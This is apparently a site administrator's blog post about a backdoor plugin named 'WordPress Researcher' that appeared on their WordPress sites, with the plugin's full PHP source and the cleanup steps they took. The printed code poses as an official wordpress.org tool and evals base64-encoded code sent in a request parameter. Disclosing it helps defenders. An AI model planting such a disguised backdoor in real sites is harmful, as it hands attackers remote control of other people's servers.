WordPress is the most popular CMS in the world, so it naturally receives special attention from attackers. Recently, several WordPress sites that I manage suddenly gained a plugin called WordPress Researcher. At first glance the name looks normal, but once you inspect the source code, it is clearly a backdoor plugin. The source code is very simple, yet it injects a backdoor into WordPress. I deleted it immediately. The plugin source file is shown below.
<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
Copyright 2013 wordpressdotorg
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
function research_plugin(){
if (isset($_REQUEST['CSSl'])){
eval(base64_decode($_REQUEST['CSSl']));
}
return;
}
add_action('after_setup_theme', 'research_plugin');
?>The Extend Calendar plugin was installed alongside WordPress Researcher, and its code was no better. I deleted that one too, then upgraded WordPress, changed the admin password, and, for extra safety, downloaded the entire site and compared it against an earlier backup to see whether the plugin had modified any other files.
